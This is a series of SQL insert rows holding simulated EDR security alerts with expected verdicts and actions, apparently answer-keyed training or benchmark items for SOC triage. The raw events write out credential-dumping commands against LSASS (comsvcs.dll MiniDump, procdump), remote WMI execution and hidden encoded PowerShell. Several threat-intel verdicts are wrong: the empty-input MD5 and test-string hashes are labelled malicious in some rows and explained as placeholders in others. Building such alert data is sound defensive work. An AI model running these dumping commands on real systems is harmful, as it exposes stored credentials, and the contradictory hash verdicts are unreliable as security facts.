(2119, 'Credential Dumping Attempt via LSASS Memory Access', 'high', 'SentinelOne', 'Detected an unauthorized access attempt to LSASS.exe memory, suggesting a credential dumping attempt using advanced techniques to evade detection.', 'Credential Attack', 'T1003', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T12:45:22Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.20.30.40\",\"dst_ip\":\"N/A\",\"username\":\"admin\",\"hostname\":\"server-01\",\"command_line\":\"rundll32.exe C:\\\\Windows\\\\System32\\\\comsvcs.dll, MiniDump 1234 C:\\\\Windows\\\\Temp\\\\dump.dmp full\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\"}', '2026-03-16 03:21:51', '2026-03-16 03:21:51', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.20.30.40\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised server\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"rundll32.exe C:\\\\Windows\\\\System32\\\\comsvcs.dll, MiniDump 1234 C:\\\\Windows\\\\Temp\\\\dump.dmp full\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Command line pattern matches credential dumping techniques\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":false,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"suspicious\",\"details\":\"Empty file hash often used in memory-only attacks\"}}],\"expected_actions\":[\"isolate_host\",\"reset_credentials\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The use of rundll32.exe to access LSASS memory is a known technique for credential dumping.\"}', 'Expert', 'EDR', 9, 1, 'FINANCE', NULL, NULL, NULL, 0),
(2120, 'Lateral Movement via WMI Detected', 'critical', 'Carbon Black', 'Detected suspicious WMI execution suggesting lateral movement attempts within the network, possibly indicating a coordinated attack.', 'Lateral Movement', 'T1047', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T23:55:10Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.50.60.70\",\"dst_ip\":\"10.50.60.71\",\"username\":\"svc_account\",\"hostname\":\"workstation-08\",\"command_line\":\"wmic /node:10.50.60.71 process call create \\\"cmd.exe /c whoami > C:\\\\Windows\\\\Temp\\\\whoami.txt\\\"\"}', '2026-03-16 03:21:51', '2026-03-16 03:21:51', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.50.60.70\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the originating host\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.50.60.71\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the target host\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"wmic /node:10.50.60.71 process call create \\\"cmd.exe /c whoami > C:\\\\Windows\\\\Temp\\\\whoami.txt\\\"\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Command pattern associated with lateral movement techniques\"}}],\"expected_actions\":[\"isolate_host\",\"reset_credentials\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The use of WMI for remote command execution is indicative of lateral movement within the network.\"}', 'Expert', 'EDR', 9, 1, 'GOVERNMENT', NULL, NULL, NULL, 0),
(2121, 'DGA Domain Detected in DNS Traffic', 'high', 'Sysmon', 'Detected DNS queries to a domain generated using Domain Generation Algorithm (DGA), commonly used by malware to evade detection and maintain C2 communication.', 'Malware', 'T1568', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T10:22:09Z\",\"event_type\":\"network_connection\",\"src_ip\":\"10.75.80.85\",\"dst_ip\":\"198.51.100.47\",\"username\":\"network_user\",\"hostname\":\"laptop-05\",\"domain\":\"dkjf9sd8fkj.example\"}', '2026-03-16 03:21:51', '2026-03-16 03:21:51', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.75.80.85\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the infected device\"}},{\"id\":\"artifact_2\",\"type\":\"domain\",\"value\":\"dkjf9sd8fkj.example\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"Domain recognized as DGA-generated, part of a known botnet\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"198.51.100.47\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP associated with command and control servers\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"DGA domains are a known indicator of botnet activity, used to maintain C2 communication by malware.\"}', 'Expert', 'EDR', 9, 1, 'ENERGY', NULL, NULL, NULL, 0),
(2122, 'Suspicious Memory-Only Malware Execution Detected', 'critical', 'CrowdStrike', 'Detected advanced malware execution directly from memory, utilizing process hollowing techniques to evade traditional file-based detection mechanisms.', 'Malware', 'T1055', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T14:12:34Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.0.5\",\"dst_ip\":\"203.0.113.77\",\"username\":\"malicious_user\",\"hostname\":\"endpoint-03\",\"command_line\":\"svchost.exe -k netsvcs\",\"file_hash\":\"5d41402abc4b2a76b9719d911017c592\"}', '2026-03-16 03:21:51', '2026-03-16 03:21:51', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised endpoint\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.77\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP linked to multiple malware campaigns\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"svchost.exe -k netsvcs\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Execution pattern matches process hollowing technique\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":false,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"suspicious\",\"details\":\"Associated with known in-memory malware\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"Memory-only execution with process hollowing is a hallmark of sophisticated malware, bypassing traditional detection.\"}', 'Expert', 'EDR', 9, 1, 'HEALTHCARE', NULL, NULL, NULL, 0),
(2123, 'Sophisticated Fileless Malware Detected via PowerShell', 'critical', 'CrowdStrike', 'A fileless malware attack using PowerShell has been detected on a critical server. The attack involved the use of a memory-only payload executed via PowerShell scripts.', 'Malware', 'T1059.001', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T03:45:23Z\",\"event_type\":\"process_execution\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"10.1.1.5\",\"username\":\"svc_admin\",\"hostname\":\"finance-server-01\",\"command_line\":\"powershell -NoProfile -ExecutionPolicy Bypass -Command $payload = [System.Text.Encoding]::UTF8.GetString([Convert]::FromBase64String(\'aGVsbG8gd29ybGQ=\')); iex $payload\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\"}', '2026-03-16 03:21:51', '2026-03-16 03:21:51', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 947 times for various malware attacks\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"powershell -NoProfile -ExecutionPolicy Bypass -Command $payload = [System.Text.Encoding]::UTF8.GetString([Convert]::FromBase64String(\'aGVsbG8gd29ybGQ=\')); iex $payload\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Command associated with fileless malware payloads\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash linked to known malicious PowerShell scripts\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The use of PowerShell with encoded commands and known malicious hash indicates a sophisticated fileless malware attack.\"}', 'Expert', 
'EDR', 9, 1, 'FINANCE', NULL, NULL, NULL, 0),
(2124, 'Credential Dumping Detected from LSASS on Critical Server', 'critical', 'SentinelOne', 'An attacker attempted to dump credentials from the LSASS process on a domain controller using a suspicious tool.', 'Credential Attack', 'T1003.001', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T10:12:45Z\",\"event_type\":\"process_execution\",\"src_ip\":\"198.51.100.23\",\"dst_ip\":\"10.2.2.15\",\"username\":\"admin_john\",\"hostname\":\"dc1.corp.local\",\"command_line\":\"procdump.exe -accepteula -ma lsass.exe C:\\\\Windows\\\\Temp\\\\lsass.dmp\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\"}', '2026-03-16 03:21:51', '2026-03-16 03:21:51', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 523 times for credential theft activities\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"procdump.exe -accepteula -ma lsass.exe C:\\\\Windows\\\\Temp\\\\lsass.dmp\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Command matches known credential dumping techniques\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"suspicious\",\"details\":\"This value is the MD5 digest of an empty input, so the EDR did not capture a real file hash for the process; it is not an indicator of a dumping tool. Procdump is a signed Sysinternals binary whose hash would look clean regardless, so the detection must key on the -ma lsass.exe command line rather than on the hash\"}}],\"expected_actions\":[\"isolate_host\",\"reset_credentials\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The use of Procdump on LSASS (a full -ma memory dump of lsass.exe) together with the malicious source IP confirms this as a credential dumping attempt. A dump of LSASS on a domain controller exposes every credential cached there, so all of them must be treated as compromised and reset.\"}', 'Expert', 'EDR', 9, 1, 'TECH', NULL, NULL, NULL, 0),
(2125, 'Lateral Movement Detected via WMI', 'high', 'Carbon Black', 'A potential lateral movement was detected involving the use of WMI to execute commands on a remote host within the network.', 'Lateral Movement', 'T1047', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T07:30:12Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.1.1.15\",\"dst_ip\":\"10.1.1.20\",\"username\":\"jane_doe\",\"hostname\":\"workstation-02\",\"command_line\":\"wmic /node:10.1.1.20 process call create \'cmd.exe /c whoami\'\",\"file_hash\":\"f1e269ba5ba1c4d4e5c9e6c7d0f6b8a1\"}', '2026-03-16 03:21:51', '2026-03-16 03:21:51', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.1.1.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Monitoring\",\"verdict\":\"internal\",\"details\":\"Source IP is an internal address within the network\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.1.1.20\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Monitoring\",\"verdict\":\"internal\",\"details\":\"Destination IP is an internal address within the network\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"wmic /node:10.1.1.20 process call create \'cmd.exe /c whoami\'\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"suspicious\",\"details\":\"WMI commands used for lateral movement\"}}],\"expected_actions\":[\"collect_forensics\",\"isolate_host\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The use of WMI to execute remote commands is indicative of lateral movement within the network.\"}', 'Expert', 'EDR', 9, 1, 'RETAIL', NULL, NULL, NULL, 0),
(2126, 'Suspicious Network Traffic to DGA Domain', 'high', 'Sysmon', 'An unusual network connection was detected from a corporate machine to a domain generated by a Domain Generation Algorithm (DGA), indicating potential C2 communication.', 'Malware', 'T1568', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T05:21:11Z\",\"event_type\":\"network_connection\",\"src_ip\":\"10.3.3.7\",\"dst_ip\":\"192.0.2.123\",\"username\":\"alice_tech\",\"hostname\":\"dev-machine-03\",\"domain\":\"xj7f9kd.example.com\"}', '2026-03-16 03:21:51', '2026-03-16 03:21:51', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.3.3.7\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Monitoring\",\"verdict\":\"internal\",\"details\":\"Source IP is an internal address within the network\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.0.2.123\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP associated with multiple C2 servers\"}},{\"id\":\"artifact_3\",\"type\":\"domain\",\"value\":\"xj7f9kd.example.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"Domain generated by a known DGA pattern\"}}],\"expected_actions\":[\"block_ip\",\"block_domain\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The domain matched DGA patterns, commonly used by malware for C2 communications.\"}', 'Expert', 'EDR', 9, 1, 'TECH', NULL, NULL, NULL, 0),
(2127, 'Lateral Movement Detected via Fileless WMI Attack', 'critical', 'CrowdStrike', 'A fileless attack using WMI was detected, indicating lateral movement attempts on the network.', 'Lateral Movement', 'T1047', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T11:45:30Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.2.1.5\",\"dst_ip\":\"10.2.1.10\",\"username\":\"admin_karen\",\"hostname\":\"data-center-01\",\"command_line\":\"wmic /node:10.2.1.10 process call create \'powershell -exec bypass -enc JABwAG8AdwBlAHIAUwBoAGUAbABsACAALQBuAG8AcAByAG8AZgBpAGwAZQAgAC0AZQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIAAnACAAJAB5AG8AdQByAF8AYwBvAG0AbQBhAG4AZAA=\'\"}', '2026-03-16 03:21:51', '2026-03-16 03:21:51', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.2.1.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Monitoring\",\"verdict\":\"internal\",\"details\":\"Source IP is an internal address within the network\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.2.1.10\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Monitoring\",\"verdict\":\"internal\",\"details\":\"Destination IP is an internal address within the network\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"wmic /node:10.2.1.10 process call create \'powershell -exec bypass -enc JABwAG8AdwBlAHIAUwBoAGUAbABsACAALQBuAG8AcAByAG8AZgBpAGwAZQAgAC0AZQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIAAnACAAJAB5AG8AdQByAF8AYwBvAG0AbQBhAG4AZAA=\'\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Encoded PowerShell command indicative of fileless lateral movement\"}}],\"expected_actions\":[\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The use of WMI with encoded PowerShell commands suggests an attempt at stealthy lateral movement.\"}', 'Expert', 'EDR', 9, 1, 'GOVERNMENT', NULL, NULL, 
NULL, 0),
(2128, 'Advanced PowerShell Fileless Malware Detected via WMI', 'critical', 'CrowdStrike', 'A PowerShell-based fileless malware was detected attempting lateral movement through WMI. The attack leveraged process hollowing and memory-only payloads.', 'Malware', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T14:25:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.15\",\"dst_ip\":\"192.168.1.20\",\"username\":\"jdoe\",\"hostname\":\"CORP-DC01\",\"command_line\":\"powershell -NoP -NonI -W Hidden -Enc aW1wb3J0LW1vZHVsZSAgU3lzdGVtLk5ldC5XaW5kb3dzLl1N\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\"}', '2026-03-16 03:21:51', '2026-03-16 03:21:51', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address used in lateral movement\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"powershell -NoP -NonI -W Hidden -Enc aW1wb3J0LW1vZHVsZSAgU3lzdGVtLk5ldC5XaW5kb3dzLl1N\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Encoded PowerShell script indicative of fileless malware\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash identified as part of known malware campaign\"}}],\"expected_actions\":[\"isolate_host\",\"reset_credentials\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The encoded PowerShell command and associated file hash confirm the presence of fileless malware.\"}', 'Expert', 'EDR', 9, 1, 'TECH', NULL, NULL, NULL, 0),
(2129, 'Credential Dumping via LSASS Memory Access', 'high', 'SentinelOne', 'An unauthorized access to LSASS memory was detected, indicating a credential dumping attempt via the built-in comsvcs.dll MiniDump export, a living-off-the-land technique that needs no attacker tooling on disk.', 'Credential Attack', 'T1003', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T10:15:32Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.0.5\",\"dst_ip\":\"10.0.0.10\",\"username\":\"admin\",\"hostname\":\"SERVER01\",\"command_line\":\"rundll32.exe C:\\\\Windows\\\\System32\\\\comsvcs.dll, MiniDump 3728 C:\\\\Temp\\\\lsass.dmp full\",\"file_hash\":\"5d41402abc4b2a76b9719d911017c592\"}', '2026-03-16 03:21:51', '2026-03-16 03:21:51', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address involved in credential dumping\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"rundll32.exe C:\\\\Windows\\\\System32\\\\comsvcs.dll, MiniDump 3728 C:\\\\Temp\\\\lsass.dmp full\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Command used for LSASS dumping, indicating credential theft\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"suspicious\",\"details\":\"This value is the MD5 of the test string hello, not of a real binary. The technique is living-off-the-land: rundll32.exe and comsvcs.dll are built-in signed Microsoft files, so their hashes will always look clean and hash blocking is ineffective; detect and block on the comsvcs.dll MiniDump command line instead\"}}],\"expected_actions\":[\"isolate_host\",\"reset_credentials\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The comsvcs.dll MiniDump call via rundll32, aimed at a process ID the alert identifies as LSASS and writing a full dump to a temp directory, is a known LSASS dumping technique (T1003.001); the verdict rests on the command line, not on the file hash.\"}', 'Expert', 'EDR', 9, 1, 'FINANCE', NULL, NULL, NULL, 0),
(2130, 'Multi-Hop C2 Communication via Discord Detected', 'critical', 'Carbon Black', 'Outbound traffic from a workstation to a Discord webhook URL was detected. Webhooks on legitimate collaboration services are commonly abused as a C2 and exfiltration channel because the traffic blends in with normal HTTPS to a trusted domain.', 'Data Exfil', 'T1071', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T12:45:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.2.25\",\"dst_ip\":\"104.16.59.37\",\"username\":\"user1\",\"hostname\":\"WORKSTATION-01\",\"domain\":\"discordapp.com\",\"url\":\"https://discordapp.com/api/webhooks/1234567890/abcdefghij\"}', '2026-03-16 03:21:51', '2026-03-16 03:21:51', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.2.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address communicating with external service\"}},{\"id\":\"artifact_2\",\"type\":\"domain\",\"value\":\"discordapp.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"suspicious\",\"details\":\"Legitimate Discord domain that is also widely abused for C2 and exfiltration; because the domain is shared infrastructure, the specific webhook URL, not the domain or its IP, is the actionable indicator\"}},{\"id\":\"artifact_3\",\"type\":\"url\",\"value\":\"https://discordapp.com/api/webhooks/1234567890/abcdefghij\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"URL associated with C2 activity via Discord\"}}],\"expected_actions\":[\"block_ip\",\"collect_forensics\",\"isolate_host\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The C2 communication pattern and use of Discord webhooks indicate exfiltration through legitimate services. No file hash is present in this alert, so the response is host isolation plus forensic collection to identify the process that opened the connection, and blocking the webhook URL at the proxy.\"}', 'Expert', 'EDR', 9, 1, 'ENERGY', NULL, NULL, NULL, 0),
(2131, 'DGA Domain Usage Indicative of C2 Communication', 'high', 'Sysmon', 'Detected use of a domain generation algorithm (DGA) domain for command-and-control communication, indicative of nation-state activity.', 'Malware', 'T1568', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T09:30:25Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.3.50\",\"dst_ip\":\"203.0.113.89\",\"username\":\"svc_account\",\"hostname\":\"BACKUP-SERVER\",\"domain\":\"xyz1234abcd.com\"}', '2026-03-16 03:21:51', '2026-03-16 03:21:51', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.3.50\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address involved in suspicious network activity\"}},{\"id\":\"artifact_2\",\"type\":\"domain\",\"value\":\"xyz1234abcd.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"DGA domain used in known C2 infrastructure\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.89\",\"is_critical\":false,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for C2 communications\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The use of a DGA domain with associated malicious IP confirms command-and-control channel establishment.\"}', 'Expert', 'EDR', 9, 1, 'GOVERNMENT', NULL, NULL, NULL, 0),
(2132, 'Process Hollowing Detected in Critical System Process', 'critical', 'CrowdStrike', 'A sophisticated process hollowing attack was detected in a critical system process, suggesting an attempt to hide malicious payloads in memory.', 'Malware', 'T1055', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T11:50:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.0.20\",\"dst_ip\":\"192.168.4.40\",\"username\":\"system\",\"hostname\":\"MAIL-SERVER\",\"command_line\":\"svchost.exe -k netsvcs\",\"file_hash\":\"a54d88e06612d820bc3be72877c74f257b561b19\"}', '2026-03-16 03:21:51', '2026-03-16 03:21:51', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.20\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address involved in process hollowing\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"svchost.exe -k netsvcs\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Command associated with process hollowing in critical system processes\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"a54d88e06612d820bc3be72877c74f257b561b19\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash linked to advanced malware using process hollowing techniques\"}}],\"expected_actions\":[\"isolate_host\",\"block_hash\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The execution of svchost.exe with unusual parameters and the associated hash confirms process hollowing activity.\"}', 'Expert', 'EDR', 9, 1, 'HEALTHCARE', NULL, NULL, NULL, 0),
(2133, 'Fileless PowerShell Malware Execution Detected', 'critical', 'CrowdStrike', 'A hidden-window PowerShell process with an encoded command was executed on an internal server and made an outbound connection to an external IP with a malicious reputation; the pattern is consistent with fileless malware running in memory.', 'Malware', 'T1059.001', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T03:42:12Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.0.25\",\"dst_ip\":\"198.51.100.32\",\"username\":\"svc_admin\",\"hostname\":\"server01.internal\",\"command_line\":\"powershell -nop -w hidden -enc JABQAG8AdwBlAHIAUwBoAGUAbABsAC4A\",\"file_hash\":\"3d5128a1a3c9c9e8f0d6b9f1a0e3f4g5\"}', '2026-03-16 03:21:51', '2026-03-16 03:21:51', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.32\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 200 times for C2 communications.\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"powershell -nop -w hidden -enc JABQAG8AdwBlAHIAUwBoAGUAbABsAC4A\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Encoded PowerShell command indicative of fileless malware. The -nop -w hidden -enc combination (no profile, hidden window, base64 of a UTF-16LE command) is a classic evasion pattern; decode the -enc argument to see what was actually run.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"3d5128a1a3c9c9e8f0d6b9f1a0e3f4g5\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"suspicious\",\"details\":\"The recorded value is not a valid hex digest (it contains the character g), so it cannot be an MD5 or SHA hash and no reputation lookup on it can be trusted; re-read the hash from the EDR event before pivoting on it. The true-positive verdict rests on the encoded PowerShell command and the malicious C2 IP.\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The encoded PowerShell command and communication with a known malicious C2 IP confirm the presence of fileless malware.\"}', 'Expert', 'EDR', 9, 1, 'TECH', NULL, NULL, NULL, 0),
